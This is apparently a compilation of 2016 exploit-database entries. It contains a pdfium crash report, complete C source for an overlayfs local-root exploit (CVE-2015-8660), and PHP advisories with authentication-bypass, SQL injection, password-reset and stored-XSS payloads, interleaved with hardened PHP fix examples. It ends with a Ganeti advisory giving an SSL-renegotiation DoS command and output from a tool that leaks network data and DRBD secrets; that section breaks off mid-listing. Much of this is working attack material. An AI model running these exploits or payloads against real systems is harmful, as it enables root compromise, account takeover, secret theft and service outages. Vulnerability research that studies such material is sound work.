
Source: https://code.google.com/p/google-security-research/issues/detail?id=612

The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:

--- cut ---
$ ./pdfium_test asan_stack-oob_b9a750_1372_52559cc9c86b4bc0fb43218c7f69c5c8 
Rendering PDF file asan_stack-oob_b9a750_1372_52559cc9c86b4bc0fb43218c7f69c5c8.
Non-linearized path...
=================================================================
==22207==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc8b7edb84 at pc 0x000000d6f064 bp 0x7ffc8b7ed8c0 sp 0x7ffc8b7ed8b8
READ of size 4 at 0x7ffc8b7edb84 thread T0
    #0 0xd6f063 in CPDF_Function::Call(float*, int, float*, int&) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:896:9
    #1 0xd6ecd2 in CPDF_StitchFunc::v_Call(float*, float*) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:808:3
    #2 0xd6f6a7 in CPDF_Function::Call(float*, int, float*, int&) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:902:3
    #3 0xedbc22 in DrawFuncShading(CFX_DIBitmap*, CFX_Matrix*, CPDF_Dictionary*, CPDF_Function**, int, CPDF_ColorSpace*, int) core/src/fpdfapi/fpdf_render/fpdf_render_pattern.cpp:293:15
    #4 0xeda3c0 in CPDF_RenderStatus::DrawShading(CPDF_ShadingPattern*, CFX_Matrix*, FX_RECT&, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_pattern.cpp:875:7
    #5 0xee45b9 in CPDF_RenderStatus::ProcessShading(CPDF_ShadingObject*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render_pattern.cpp:954:3
    #6 0xe6700d in CPDF_RenderStatus::ProcessObjectNoClip(CPDF_PageObject const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:399:14
    #7 0xe61f6d in CPDF_RenderStatus::RenderSingleObject(CPDF_PageObject const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:292:3
    #8 0xe618c1 in CPDF_RenderStatus::RenderObjectList(CPDF_PageObjects const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:269:5
    #9 0xe6bc26 in CPDF_RenderStatus::ProcessForm(CPDF_FormObject*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:485:3
    #10 0xe6704c in CPDF_RenderStatus::ProcessObjectNoClip(CPDF_PageObject const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:402:14
    #11 0xe67f47 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:330:3
    #12 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
    #13 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
    #14 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
    #15 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
    #16 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
    #17 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
    #18 0x4f16e9 in main samples/pdfium_test.cc:608:5

Address 0x7ffc8b7edb84 is located in stack of thread T0 at offset 36 in frame
    #0 0xd6e2af in CPDF_StitchFunc::v_Call(float*, float*) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:795

  This frame has 2 object(s):
    [32, 36) 'input' <== Memory access at offset 36 overflows this variable
    [48, 52) 'nresults'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:896:9 in CPDF_Function::Call(float*, int, float*, int&) const
Shadow bytes around the buggy address:
  0x1000116f5b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5b50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5b60: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
=>0x1000116f5b70:[04]f2 04 f3 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==22207==ABORTING
--- cut ---

While AddressSanitizer reports the crash on a memory read, an out-of-bounds write follows in the same method, so the bug is a stack-based buffer overflow rather than only an over-read.

The crash was reported at https://code.google.com/p/chromium/issues/detail?id=551460. Attached is the PDF file which triggers the crash.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39165.zip
            
/*
just another overlayfs exploit, works on kernels before 2015-12-26

# Exploit Title: overlayfs local root
# Date: 2016-01-05
# Exploit Author: rebel
# Version: Ubuntu 14.04 LTS, 15.10 and more
# Tested on: Ubuntu 14.04 LTS, 15.10
# CVE : CVE-2015-8660

blah@ubuntu:~$ id
uid=1001(blah) gid=1001(blah) groups=1001(blah)
blah@ubuntu:~$ uname -a && cat /etc/issue
Linux ubuntu 3.19.0-42-generic #48~14.04.1-Ubuntu SMP Fri Dec 18 10:24:49 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
Ubuntu 14.04.3 LTS \n \l
blah@ubuntu:~$ ./overlayfail
root@ubuntu:~# id
uid=0(root) gid=1001(blah) groups=0(root),1001(blah)

12/2015
by rebel

6354b4e23db225b565d79f226f2e49ec0fe1e19b
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>
#include <sys/wait.h>

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
    system("rm -rf /tmp/haxhax");
    mkdir("/tmp/haxhax", 0777);
    mkdir("/tmp/haxhax/w", 0777);
    mkdir("/tmp/haxhax/u",0777);
    mkdir("/tmp/haxhax/o",0777);

    if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) {
        fprintf(stderr,"mount failed..\n");
    }

    chmod("/tmp/haxhax/w/work",0777);
    chdir("/tmp/haxhax/o");
    chmod("bash",04755);
    chdir("/");
    umount("/tmp/haxhax/o");
    return 0;
}

int
main(int argc, char **argv)
{
    int status;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;
    struct stat s;

    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);

        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);

    wait(NULL);

    stat("/tmp/haxhax/u/bash",&s);

    if(s.st_mode == 0x89ed)
        execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL);

    fprintf(stderr,"couldn't create suid :(\n");
    return -1;
}
            
Exploit Title   : Online Airline Booking System multiple vulnerabilities
Author          : WICS
Date            : 05/1/2016
Software Link   : http://sourceforge.net/projects/oabs/
Affected Version: All
 
 
Overview:
 
 
The Online Airline Booking System is designed to be an all-in-one solution for an airline wishing to speed up bookings and save money compared to a traditional booking system. It consists of a server-side web application combined with a powerful backend database, giving users a highly accessible system.
 
1. Authentication Bypass

The admin panel's authentication check relies on $_COOKIE['LoggedIn']. Since cookie values are entirely under the client's control, any user can reach the admin panel without knowing a username or password.
line no. 2          if(!isset($_COOKIE['LoggedIn'])) die("You are not logged in!");

Setting the cookie LoggedIn=yes in the request header is enough; the application then treats the request as logged in:
Cookie: LoggedIn=yes

2. Application Reinstallation
 
install.php can be used to reinstall the application. Opening
application/install.php

shows a form whose first text field is the new admin username and whose second field is the new application password. Completing the installation sets the application up with the attacker-supplied admin username and password.
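As an added illustration (not code from the Online Airline Booking System or its author), the cookie check quoted above next to a session-based replacement; the admins table, its username/password_hash columns and the open PDO handle $pdo are assumptions.

```php
<?php
// Added example: contrasts the cookie-only check quoted from the admin panel
// with a server-side session check. Not the project's code. The admins table,
// its username/password_hash columns and the open PDO handle $pdo are assumed.
declare(strict_types=1);

// --- Vulnerable pattern (advisory, line 2 of the admin panel) ---
// The browser controls every cookie value, so "Cookie: LoggedIn=yes" is
// accepted from anyone; nothing ties the flag to a completed login.
function isAdminVulnerable(array $cookie): bool
{
    return isset($cookie['LoggedIn']);
}

// --- Hardened pattern ---
// Session cookie flags: not readable by scripts, only sent over HTTPS,
// not attached to cross-site POSTs. Must run before any output.
function configureSession(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Verifies the submitted credentials against a password_hash() value and,
// on success, records the login in the server-side session only.
function adminLogin(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare('SELECT id, password_hash FROM admins WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return false;
    }
    // Fresh session id on privilege change blocks session fixation.
    session_regenerate_id(true);
    $_SESSION['admin_id'] = (int) $row['id'];
    $_SESSION['login_at'] = time();
    return true;
}

// Replacement for the cookie check at the top of every admin page.
// The client cannot forge $_SESSION; it is populated only by adminLogin().
function requireAdmin(array $session): void
{
    if (empty($session['admin_id'])) {
        http_response_code(403);
        die('You are not logged in!');
    }
}

// login.php handler
configureSession();
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $user = (string) ($_POST['username'] ?? '');
    $pass = (string) ($_POST['password'] ?? '');
    if (adminLogin($pdo, $user, $pass)) {
        header('Location: admin.php');
        exit;
    }
    http_response_code(401);
}

// admin.php would instead begin with:
//   configureSession();
//   requireAdmin($_SESSION);
```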
 
            
Exploit Title : Multiple Vulnerabilities in Simple PHP Polling System.
Author        : WICS
Date          : 05-Jan-2016
Software Link : http://sourceforge.net/projects/pollingsystem/


# Overview :
Simple PHP Polling System helps organizations run polls for different positions, with a number of candidates under each position.
This vulnerable package has 5869+ downloads to date.
Multiple vulnerabilities (SQL injection, persistent cross-site scripting, password reset).

1. SQL injection : SQL injection exists in the following pages :
   --------------
a) manage-profile.php : the user-supplied value of the parameter $_POST['email'] is neither filtered nor validated:
line no.33 -> $myEmail = $_POST['email'];
...
...
...
line no 38 -> $sql = mysql_query( "UPDATE tbMembers SET first_name='$myFirstName', last_name='$myLastName', email='$myEmail', password='$newpass' WHERE member_id = '$myId'" )  or die( mysql_error() );

An attacker can inject into the POST parameter email to perform a SQL injection attack.


b) registeracc.php : the user-supplied value of the parameter $_POST['email'] is neither filtered nor validated:
line no.26 -> $myEmail = $_POST['email'];
...
...
...
line no 30 -> $sql = mysql_query( "INSERT INTO tbMembers(first_name, last_name, email, password) VALUES ('$myFirstName','$myLastName', '$myEmail', '$newpass')" )
        or die( mysql_error() );

An attacker can inject into the POST parameter email to perform a SQL injection attack.

# PoC : firstname=WICS&lastname=tester&email=tester%40wics.com' or updatexml(2,concat(0x7e,(version())),0) or'&password=password&ConfirmPassword=password&submit=Register+Account

2. Password reset :
   ---------------
In the manage-profile.php page,
line no 38 -> $sql = mysql_query( "UPDATE tbMembers SET first_name='$myFirstName', last_name='$myLastName', email='$myEmail', password='$newpass' WHERE member_id = '$myId'" )

By changing the value of 'member_id', an attacker can reset another user's details, including their password.
Steps to reproduce :
1. Log in to your account.
2. Navigate to Manage My Profile.

The request will look like - http://localhost/vote/manage-profile.php?id= somenumber
Here the value of id is the victim's member id, and the values of the remaining POST parameters are set by the attacker.
# PoC :  firstname=Attacker&lastname=LastNmae&email=Tester%40wics.com&password=adminadmin&ConfirmPassword=adminadmin&update=Update+Profile


3. Persistent Cross site Scripting :
   -----------------------------------
In the 'registeracc.php' and 'manage-profile.php' pages the value of the POST parameter 'email' supplied by the user is not validated. This leaves the application vulnerable to persistent cross-site scripting.

# PoC :   firstname=WICS&lastname=wics&email=<script>alert(document.location)</script>&password=admin&ConfirmPassword=admin&update=Update+Profile
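As an added illustration (not code from Simple PHP Polling System or its author), a rewrite of the manage-profile.php update that closes all three findings: PDO prepared statements replace the advisory's mysql_query string building, member_id comes from the session rather than ?id=, and the email is validated on input and HTML-encoded on output. The $pdo connection, the session layout and password hashing are assumptions.

```php
<?php
// Added example, not code from Simple PHP Polling System. It reworks the
// advisory's manage-profile.php UPDATE so the three reported issues are
// closed: SQL injection through 'email', password reset of other members via
// 'member_id', and stored XSS when the email is displayed.
// Assumptions: an open PDO connection $pdo, the tbMembers table and columns
// quoted in the advisory, and a session holding member_id set at login.
declare(strict_types=1);

// Vulnerable shape (advisory, line 38): every value is interpolated into the
// query and $myId comes from the request, so a logged-in user can overwrite
// any member's row, including the password.
//   $sql = mysql_query( "UPDATE tbMembers SET ... password='$newpass'
//                        WHERE member_id = '$myId'" ) or die( mysql_error() );

// Returns the list of validation errors; an empty list means the update may
// proceed. Field names match the advisory's PoC requests.
function validateProfile(array $post): array
{
    $errors = [];
    if (filter_var($post['email'] ?? '', FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'invalid email';
    }
    if (($post['password'] ?? '') !== ($post['ConfirmPassword'] ?? '')) {
        $errors[] = 'passwords do not match';
    }
    if (strlen($post['password'] ?? '') < 8) {
        $errors[] = 'password too short';
    }
    foreach (['firstname', 'lastname'] as $f) {
        if (!preg_match('/^[\p{L}\p{M}\' .-]{1,64}$/u', $post[$f] ?? '')) {
            $errors[] = "invalid $f";
        }
    }
    return $errors;
}

// Hardened update: prepared statement (no string interpolation), the member
// id is taken from the server-side session rather than ?id= in the URL, and
// the password is stored as a hash (assumed; the original storage is unknown).
function updateProfile(PDO $pdo, int $sessionMemberId, array $post): bool
{
    if (validateProfile($post) !== []) {
        return false;
    }
    $stmt = $pdo->prepare(
        'UPDATE tbMembers SET first_name = :fn, last_name = :ln, email = :em, password = :pw
         WHERE member_id = :id'
    );
    return $stmt->execute([
        ':fn' => $post['firstname'],
        ':ln' => $post['lastname'],
        ':em' => $post['email'],
        ':pw' => password_hash($post['password'], PASSWORD_DEFAULT),
        ':id' => $sessionMemberId,   // never $_GET['id']
    ]);
}

// Output encoding closes the stored XSS: the advisory's
// <script>alert(document.location)</script> payload renders as plain text.
function renderEmail(string $email): string
{
    return '<span class="email">'
        . htmlspecialchars($email, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '</span>';
}

// Request handler sketch for manage-profile.php.
session_start();
if (empty($_SESSION['member_id'])) {
    http_response_code(403);
    exit('You must be logged in.');
}
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['update'])) {
    $ok = updateProfile($pdo, (int) $_SESSION['member_id'], $_POST);
    echo $ok ? renderEmail((string) $_POST['email']) : 'update rejected';
}
```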
            
=begin
## Advisory Information

Title: Ganeti Security Advisory (DoS, Unauthenticated Info Leak)
Advisory URL: https://pierrekim.github.io/advisories/2016-ganeti-0x00.txt
Blog URL: https://pierrekim.github.io/blog/2016-01-05-Ganeti-Info-Leak-DoS.html
Date published: 2016-01-05
Vendors contacted: Google, MITRE
Organization contacted: Riseup
Release mode: Released
CVE: CVE-2015-7944, CVE-2015-7945
CNNVD: no current CNNVD



## Product Description

Ganeti is a virtual machine cluster management tool developed by Google.
The solution stack uses either Xen or KVM as the virtualization
platform, LVM for disk management,
and optionally DRBD for disk replication across physical hosts.



## Vulnerabilities Summary

Ganeti has security problems in the default install (with DRBD) and
the default configuration, due to old libraries and design problems,
even though the security level of Ganeti appears to be high.

These problems affect every version up to and including the latest release.

The Ganeti API daemon (RAPI) listens on every interface by default and an
attacker can DoS this daemon.

It is also possible to abuse this daemon to retrieve information, such
as the network topology and DRBD secrets, without authentication.

A PoC is provided to automatically retrieve this sensitive information, and
a possible scenario allowing an attacker to take over virtual machines
remotely is described (which worked in my lab under certain conditions).



## Details - CVE-2015-7944 - Unauthenticated Remote DoS

Ganeti is prone to an SSL DoS through repeated SSL renegotiation against the RAPI daemon:

user@kali:~$ (sleep 1; while true;do echo R;done) | openssl s_client
-connect 10.105.1.200:5080
CONNECTED(00000003)
depth=0 CN = ganeti.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = ganeti.example.com
verify return:1
---
Certificate chain
 0 s:/CN=ganeti.example.com
   i:/CN=ganeti.example.com
---
Server certificate
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----
subject=/CN=ganeti.example.com
issuer=/CN=ganeti.example.com
---
No client certificate CA names sent
---
SSL handshake has read 1003 bytes and written 625 bytes
---
New, TLSv1/SSLv3, Cipher is AES256-GCM-SHA384
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : AES256-GCM-SHA384
    Session-ID: D75BCF369143CD008D693B022B967149AF0BD420DE385C51227A1921CD29360D
    Session-ID-ctx:
    Master-Key:
7DDD57FD479AE6555D1D42CF2B15B8857C28430189EC5C1331C75C4253E4A9F0FC0672EE2F2438CD055328C5A46C4F5F
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 300 (seconds)
    TLS session ticket:
    0000 - 10 ad 69 39 76 6c 2e 37-cf e7 c2 2c 5f f0 e0 20   ..i9vl.7...,_..
    0010 - 5d 85 5a 79 82 20 6a 1d-f1 6e 51 f5 f2 f7 c6 cf   ].Zy. j..nQ.....
    0020 - c1 85 2d 42 5a 1c 53 b4-cb db de 65 04 2a 02 da   ..-BZ.S....e.*..
    0030 - 5c 7d 82 ef 56 4a a4 a1-88 bd 87 fd af 25 e3 2e   \}..VJ.......%..
    0040 - 28 68 04 a4 01 22 88 72-30 0b 79 1c 75 61 88 d5   (h...".r0.y.ua..
    0050 - c9 f3 e2 0b 02 50 bf c8-29 ac d9 36 f3 76 bd 8b   .....P..)..6.v..
    0060 - 05 e0 d3 a9 f3 8b 8b 11-ef 19 2f 94 92 30 94 58   ........../..0.X
    0070 - aa 64 ba 3f a4 fc 15 4b-74 11 3b c3 c7 e7 d4 33   .d.?...Kt.;....3
    0080 - dd 76 e9 e1 1b 3a 95 c4-50 28 4f 9e bc cc cb f3   .v...:..P(O.....
    0090 - bf 4d 60 92 64 00 af 67-c0 e9 69 e3 98 54 21 dc   .M`.d..g..i..T!.

    Start Time: 1438121399
    Timeout   : 300 (sec)
    Verify return code: 18 (self signed certificate)
---
RENEGOTIATING
depth=0 CN = ganeti.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = ganeti.example.com
verify return:1
RENEGOTIATING
depth=0 CN = ganeti.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = ganeti.example.com
verify return:1
RENEGOTIATING
depth=0 CN = ganeti.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = ganeti.example.com
verify return:1
RENEGOTIATING
[...]


From my test, 1 thread takes 75% of CPU.

  `top` on the main server (10.105.1.200):
  19734 gnt-rapi  20   0  148980  35364   4696 R  76.8  3.7   0:04.12 ganeti-rapi


Multiple threads will eat all the available CPUs and will likely DoS ganeti:

  21280 gnt-rapi  20   0  148980  35364   4696 R  35.3  3.7   0:05.06 ganeti-rapi
  20968 gnt-rapi  20   0  148980  35364   4696 R  33.4  3.7   0:09.92 ganeti-rapi
  20969 gnt-rapi  20   0  148980  35364   4696 R  32.4  3.7   0:09.95 ganeti-rapi
  21282 gnt-rapi  20   0  148980  35364   4696 R  32.4  3.7   0:04.53 ganeti-rapi
  21281 gnt-rapi  20   0  148980  35364   4696 R  31.4  3.7   0:04.78 ganeti-rapi


An attacker can use tools from THC to perform SSL DoS too (openssl was
the fastest solution out of the box):

  https://www.thc.org/thc-ssl-dos/



## Details - CVE-2015-7945 - Unauthenticated Remote Information Disclosure

This vulnerability allows an attacker to retrieve data through an
information disclosure and, depending on the configuration, to remotely
compromise VMs.
A PoC (GHETTO-BLASTER which works in Linux (Debian, Kali) and FreeBSD)
is provided as a base64-encoded file to this email.
This PoC is also available here:
https://pierrekim.github.io/advisories/GHETTO-BLASTER.


I. Design Security Problem with the RAPI Daemon

In the Ganeti master node, when using /usr/sbin/gnt-network, a
non-root user can't get information (debian-01 is the ganeti master
node):

  user@debian-01:~$ /usr/sbin/gnt-network list
  It seems you don't have permissions to connect to the master daemon.
  Please retry as a different user.
  user@debian-01:~$

This is common to all gnt-* tools and appears to be a deliberate security design.

However, Ganeti's RAPI daemon is too open by default: it listens on every
interface, and the network configuration, for example, can be extracted
from jobs through the RAPI daemon without authentication.

I wrote a tool, "GHETTO-BLASTER", to industrialize the process:

  user@kali:~$ ./GHETTO-BLASTER http://<ip_of_ganeti_rapi>

  Example:
    https://<ip>

  2015 Pierre Kim <pierre.kim.sec@gmail.com>
       @PierreKimSec https://pierrekim.github.io
  DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
<http://www.wtfpl.net/txt/copying/>
  user@kali:~$ ./GHETTO-BLASTER http://10.105.1.200
  [...]
  [a lot of output]
  [...]
  user@kali:~$ ls -l 2-networks  2-networks-test-priv 2-networks-test-pub
  -rw-r--r-- 1 user user 228 Jun 20 13:37 2-networks
  -rw-r--r-- 1 user user 882 Jun 20 13:37 2-networks-test-priv
  -rw-r--r-- 1 user user 881 Jun 20 13:37 2-networks-test-pub
  user@kali:~$ cat 2-networks  2-networks-test-priv 2-networks-test-pub
$VAR1 = [
          {
            'name' => 'test-priv',
            'uri' => '/2/networks/test-priv'
          },
          {
            'uri' => '/2/networks/test-pub',
            'name' => 'test-pub'
          }
        ];
$VAR1 = {
          'mtime' => '1333027652.67126',
          'gateway' => undef,
          'network6' => undef,
          'inst_list' => [],
          'mac_prefix' => undef,
          'serial_no' => 1,
          'free_count' => 254,
          'name' => 'test-priv',
          'map' =>
'X..............................................................................................................................................................................................................................................................X',
          'gateway6' => undef,
          'external_reservations' => '192.168.1.0, 192.168.1.255',
          'uuid' => '506ad97b-2276-43f4-ae27-e6bbb97f28ff',
          'ctime' => '1333027652.67126',
          'reserved_count' => 2,
          'network' => '192.168.1.0/24',
          'group_list' => [],
          'tags' => []
        };
$VAR1 = {
          'mac_prefix' => undef,
          'inst_list' => [],
          'network6' => undef,
          'mtime' => '1333027641.64375',
          'gateway' => undef,
          'map' =>
'X..............................................................................................................................................................................................................................................................X',
          'free_count' => 254,
          'name' => 'test-pub',
          'serial_no' => 1,
          'reserved_count' => 2,
          'network' => '192.168.0.0/24',
          'ctime' => '1333027641.64375',
          'gateway6' => undef,
          'uuid' => '48b34199-2d23-46f0-b4aa-2539cb4a7780',
          'external_reservations' => '192.168.0.0, 192.168.0.255',
          'group_list' => [],
          'tags' => []
        };
user@kali:~$


It's possible to map the network and to retrieve sensitive secrets.

Other interesting information:

osparams_secret is readable in jobs using the access to RAPI.


II. Using this information disclosure to hack VMs:

By default, /var/lib/ganeti/config.data(640, gnt-masterd:gnt-confd)
contains the secret key for DRBD replication.
A remote user or even a local non-root (or non gnt-masterd user) can't
get the configuration of DRBD.

This key can be extracted from jobs by abusing the RAPI daemon without
authentication.

After running GHETTO-BLASTER, you will have a lot of files:

user@kali:~$ ls
1-list-collectors                        2-jobs-121  2-jobs-154
2-jobs-187  2-jobs-219  2-jobs-251  2-jobs-284  2-jobs-47  2-jobs-8
1-report-all                             2-jobs-122  2-jobs-155
2-jobs-188  2-jobs-22   2-jobs-252  2-jobs-285  2-jobs-48  2-jobs-80
2-features                               2-jobs-123  2-jobs-156
2-jobs-189  2-jobs-220  2-jobs-253  2-jobs-286  2-jobs-49  2-jobs-81
2-info                                   2-jobs-124  2-jobs-157
2-jobs-19   2-jobs-221  2-jobs-254  2-jobs-287  2-jobs-5   2-jobs-82
2-instances                              2-jobs-125  2-jobs-158
2-jobs-190  2-jobs-222  2-jobs-255  2-jobs-288  2-jobs-50  2-jobs-83
2-instances-vm-01                        2-jobs-126  2-jobs-159
2-jobs-191  2-jobs-223  2-jobs-256  2-jobs-289  2-jobs-51  2-jobs-84
2-instances-vm-01-info-jobs              2-jobs-127  2-jobs-16
2-jobs-192  2-jobs-224  2-jobs-257  2-jobs-29   2-jobs-52  2-jobs-85
2-instances-vm-02.example.com            2-jobs-128  2-jobs-160
2-jobs-193  2-jobs-225  2-jobs-258  2-jobs-290  2-jobs-53  2-jobs-86
2-instances-vm-02.example.com-info-jobs  2-jobs-129  2-jobs-161
2-jobs-194  2-jobs-226  2-jobs-259  2-jobs-291  2-jobs-54  2-jobs-87
2-jobs                                   2-jobs-13   2-jobs-162
2-jobs-195  2-jobs-227  2-jobs-26   2-jobs-292  2-jobs-55  2-jobs-88
2-jobs-0                                 2-jobs-130  2-jobs-163
2-jobs-196  2-jobs-228  2-jobs-260  2-jobs-293  2-jobs-56  2-jobs-89
2-jobs-1                                 2-jobs-131  2-jobs-164
2-jobs-197  2-jobs-229  2-jobs-261  2-jobs-294  2-jobs-57  2-jobs-9
2-jobs-10                                2-jobs-132  2-jobs-165
2-jobs-198  2-jobs-23   2-jobs-262  2-jobs-295  2-jobs-58  2-jobs-90
2-jobs-100                               2-jobs-133  2-jobs-166
2-jobs-199  2-jobs-230  2-jobs-263  2-jobs-296  2-jobs-59  2-jobs-91
2-jobs-101                               2-jobs-134  2-jobs-167
2-jobs-2    2-jobs-231  2-jobs-264  2-jobs-297  2-jobs-6   2-jobs-92
2-jobs-102                               2-jobs-135  2-jobs-168
2-jobs-20   2-jobs-232  2-jobs-265  2-jobs-298  2-jobs-60  2-jobs-93
2-jobs-103                               2-jobs-136  2-jobs-169
2-jobs-200  2-jobs-233  2-jobs-266  2-jobs-299  2-jobs-61  2-jobs-94
2-jobs-104                               2-jobs-137  2-jobs-17
2-jobs-201  2-jobs-234  2-jobs-267  2-jobs-3    2-jobs-62  2-jobs-95
2-jobs-105                               2-jobs-138  2-jobs-170
2-jobs-202  2-jobs-235  2-jobs-268  2-jobs-30   2-jobs-63  2-jobs-96
2-jobs-106                               2-jobs-139  2-jobs-171
2-jobs-203  2-jobs-236  2-jobs-269  2-jobs-31   2-jobs-64  2-jobs-97
2-jobs-107                               2-jobs-14   2-jobs-172
2-jobs-204  2-jobs-237  2-jobs-27   2-jobs-32   2-jobs-65  2-jobs-98
2-jobs-108                               2-jobs-140  2-jobs-173
2-jobs-205  2-jobs-238  2-jobs-270  2-jobs-33   2-jobs-66  2-jobs-99
2-jobs-109                               2-jobs-141  2-jobs-174
2-jobs-206  2-jobs-239  2-jobs-271  2-jobs-34   2-jobs-67  2-networks
2-jobs-11                                2-jobs-142  2-jobs-175
2-jobs-207  2-jobs-24   2-jobs-272  2-jobs-35   2-jobs-68  2-nodes
2-jobs-110                               2-jobs-143  2-jobs-176
2-jobs-208  2-jobs-240  2-jobs-273  2-jobs-36   2-jobs-69
2-nodes-debian-01
2-jobs-111                               2-jobs-144  2-jobs-177
2-jobs-209  2-jobs-241  2-jobs-274  2-jobs-37   2-jobs-7
2-nodes-debian-01-role
2-jobs-112                               2-jobs-145  2-jobs-178
2-jobs-21   2-jobs-242  2-jobs-275  2-jobs-38   2-jobs-70
2-nodes-debian-02
2-jobs-113                               2-jobs-146  2-jobs-179
2-jobs-210  2-jobs-243  2-jobs-276  2-jobs-39   2-jobs-71
2-nodes-debian-02-role
2-jobs-114                               2-jobs-147  2-jobs-18
2-jobs-211  2-jobs-244  2-jobs-277  2-jobs-4    2-jobs-72  2-os
2-jobs-115                               2-jobs-148  2-jobs-180
2-jobs-212  2-jobs-245  2-jobs-278  2-jobs-40   2-jobs-73  version
2-jobs-116                               2-jobs-149  2-jobs-181
2-jobs-213  2-jobs-246  2-jobs-279  2-jobs-41   2-jobs-74
2-jobs-117                               2-jobs-15   2-jobs-182
2-jobs-214  2-jobs-247  2-jobs-28   2-jobs-42   2-jobs-75
2-jobs-118                               2-jobs-150  2-jobs-183
